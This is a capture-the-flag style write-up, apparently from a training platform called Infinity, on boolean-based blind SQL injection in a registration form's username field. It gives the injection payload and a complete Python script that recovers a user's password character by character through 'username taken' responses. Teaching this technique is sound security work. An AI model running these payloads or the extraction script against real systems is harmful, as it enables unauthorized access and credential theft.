Post

Infinity - SQL Injection - Username

A walkthrough of exploiting Boolean-based SQL Injection in a registration form on Infinity platform. By crafting true/false conditions and automating character extraction with Python, we recovered user passwords from the database.

Posted Updated
Preview Image
By Mustafa Eltayeb
2 min read
Infinity - SQL Injection - Username

Infinity — SQL Injection: Username

Overview

A walkthrough of exploiting Boolean-based SQL Injection in a registration form on Infinity platform. By crafting true/false conditions and automating character extraction with Python, we recovered user passwords from the database.

Vulnerability: Boolean-based SQL Injection

Step 1: Identify the Input Field

Open the challenge and locate the Login form input field.

alt text

Step 2: Test for SQL Injection

I try user name admin and it’s taken and tried to inject ' “`” and no error appear so that i go to use Boolean Based :

alt text

first let’s imagine sql query :

1

SELECT * FROM users WHERE (username = 'username')"

so if i need to inject in username field i need to put ') and write new condition like AND 1=1 : alt text

here appear to be Boolean based SQLi : alt text

here when we make the condition (1=2) and it’s false we received username is available when try 1=1 and it’s true so that we received username is already taken we can see that our condition is work so that inject more complex conditions to retrieve password length and the password

Step 3: Try to get Password length

By Using function LENGTH we can retrieve password length if the result user available it’s wrong length and if username already taken it’s valid length

alt text

From here i know password length the password can be extracted character by character. Character Extraction Payload admin') AND SUBSTR(password,1,1)='a' AND ('1'='1 this manual but i will create python script to try chars from a to z and 0 to do this all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

#!/usr/bin/env python3

import requests

url = "http://173.208.132.134:30238"
mark = "Username already exists"  # marker to know whether the user exists
chars = "abcdefghijklmnopqrstuvwxyz1234567890"

length = int(input("Password length: "))

password = ""

for i in range(1, length + 1):
    for c in chars:
        payload = f"admin') AND SUBSTR(password,{i},1)='{c}' AND ('1'='1"

        response = requests.post(
            url,
            data={"username": payload}
        )

        if mark in response.text:
            password += c
            print(f"[+] {i}: {c} -> {password}")
            break

print(f"\nRecovered password: {password}")

alt text

and got the password correctly

for user priya change user name in the script :

Key Takeaways

  • Always test ' and " first — even if no error appears, the app might still be vulnerable.
  • When there’s no visible output, look for behavioral differences — “username taken” vs “available” is enough to build a full attack on.
  • Automating character extraction with Python saves hours — manual SUBSTR testing is impractical on real passwords.

Happy Hacking!

Follow me: LinkedIn · X

Infinity, Web_Security, SQLI
infinity CTF Web HTTP POST SQLi
This post is licensed under CC BY 4.0 by the author.